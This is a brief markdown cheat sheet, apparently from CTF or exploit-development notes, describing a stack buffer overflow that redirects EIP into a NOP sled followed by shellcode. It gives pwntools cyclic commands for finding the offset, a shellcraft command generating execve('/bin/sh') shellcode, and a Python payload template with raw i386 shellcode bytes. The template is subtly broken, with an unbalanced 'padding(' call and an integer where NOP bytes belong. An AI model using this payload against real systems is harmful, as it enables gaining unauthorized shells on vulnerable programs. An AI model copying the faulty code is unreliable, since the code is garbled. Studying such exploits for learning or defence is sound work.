# Cut Stack in Half + NOPsled

* Stack has to be executable
* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard

## shellcraft
* for example
```sh
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
```

##  Usage
* measure `eip` offset via 
    ```sh
    cyclic <number>
    ```
    * Check eip content via gdb
    ```sh
    cyclic -l <eipContent>
    ```
* Example code
```python
from pwn import *

padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode
```